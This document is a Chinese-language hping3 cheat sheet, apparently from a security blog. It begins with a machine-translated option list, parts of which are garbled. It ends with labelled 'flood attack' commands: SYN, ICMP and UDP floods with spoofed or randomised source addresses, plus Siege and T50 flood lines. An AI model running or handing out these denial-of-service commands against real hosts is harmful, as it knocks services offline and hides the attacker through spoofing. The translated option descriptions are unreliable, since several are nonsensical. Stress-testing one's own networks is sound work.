hping3
几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试
-c - 计数包计数
-i - interval wait(uX表示X微秒,例如-i u1000)
- -i u10000的快速别名(第二个10个数据包)
- -i u1000的快速别名(第二个100个数据包)
--flood尽可能快地发送数据包。不要显示回复。
-n - 数字数字输出
-q - 安静
-I - 接口接口名称(否则为默认路由接口)
-V - verbose verbose模式
-D - 调试调试信息
-z - 绑定ctrl + z到ttl(默认为dst端口)
-Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声
模式
默认模式TCP
-0 - RAIP RAW IP模式
-1 - icmp ICMP模式
-2 - 表示UDP模式
-8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
-9 - 听听模式
IP
-a - 欺骗欺骗源地址
--rand-dest随机destionation地址模式。看到那个男人。
--rand-source随机源地址模式。看到那个男人。
-t --ttl ttl(默认64)
-N - id id(默认随机)
-W --winid使用win * id字节排序
-r --rel相对化id字段(估计主机流量)
-f --frag分割更多碎片的数据包。 (可以通过弱acl)
-x --morefrag设置更多片段标志
-y --dontfrag set不分片标志
-g --fragoff设置片段偏移量
-m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
-o --tos服务类型(默认为0x00),尝试--tos帮助
-G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
--lsrr松散的源路由和记录路由
--ssrr严格的源路由和记录路由
-H --ipproto仅在RAW IP模式下设置IP协议字段
ICMP
-C --icmptype icmp type(默认回显请求)
-K - icmpcode icmp code(默认为0)
--force-icmp发送所有icmp类型(默认发送仅支持的类型)
--icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
--icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
--icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
--icmp-help显示其他icmp选项的帮助
UDP / TCP
-s --baseport基本源端口(默认随机)
-P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
-k - 保持静止源端口
-w --win winsize(默认64)
-O --tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
-Q --seqnum仅显示tcp序列号
-b --badcksum(尝试)发送具有错误IP校验和的数据包
许多系统将修复发送数据包的IP校验和
所以你会得到错误的UDP / TCP校验和。
-M --setseq设置TCP序列号
-L --setack设置TCP确认
-F --fin设置FIN标志
-S --syn设置SYN标志
-R - 首先设置RST标志
-P --push设置PUSH标志
-A --ack设置ACK标志
-U - 设置URG标志
-X --xmas设置X未使用标志(0x40)
-Y --ymas设置Y未使用标志(0x80)
--tcpexitcode使用最后的tcp-> th_flags作为退出代码
--tcp-mss启用具有给定值的TCP MSS选项
--tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间
同项
-d - 数据数据大小(默认为0)
-E - 文件中的文件数据
-e --sign添加'签名'
-j --dump以十六进制转储数据包
-J --print转储可打印字符
-B --safe启用“安全”协议
-u --end告诉你--file何时达到EOF并防止倒带
-T --traceroute traceroute mode(暗示--bind和--ttl 1)
--tr-stop在traceroute模式下收到第一个非ICMP时退出
--tr-keep-ttl保持源TTL固定,仅用于监视一跳
--tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
--apd-send发送APD描述的数据包
syn flood攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12
icmp flood攻击
hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10
udp flood攻击
hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10
Siege:http/https压力测试工具,模拟多个用户并发访问请求
siege -g http://192.168.1.12/xxsec.php / 192.168.1.12
T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn